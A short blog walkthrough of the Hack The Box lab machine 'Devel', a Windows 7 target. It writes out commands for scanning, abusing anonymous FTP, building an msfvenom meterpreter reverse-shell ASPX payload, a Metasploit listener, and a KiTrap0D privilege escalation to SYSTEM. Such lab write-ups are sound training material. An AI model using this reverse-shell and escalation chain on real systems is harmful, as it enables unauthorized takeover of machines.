HTB: Devel Walkthru


Windows Mashine


We start as usual with our nmap-scan

nmap -sC sV -p-

We found FTP with enabled anonymous login, lets use this for us.


Download all files from the FTP to our current directoy

mget *

There are only the FIles from the web server. After a test if you can write on the FTP with MSFVENOM create a payload for a reverse shell and wait with msfconsole for the connection.

Create Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f aspx >reverse.aspx

Upload the shell to the ftp-server and run msf to start a meterpreter session

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0

Call the created shell over the browser.

And here it is, we have a shell. Now we can collect some system information.

The mashine runs a old Windows 7 build, after some research a I found the exploit KiTrap0D.

Throw our meterpreter session into the background and then setup the exploit and connect to the system.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

There is also a way to do it with netcat and push an exploit manualy with a python http-server. I felt both ways equally fast and not very different in complexity.

The flags are always on the desktops of the users.

Leave a reply

Your email address will not be published. Required fields are marked *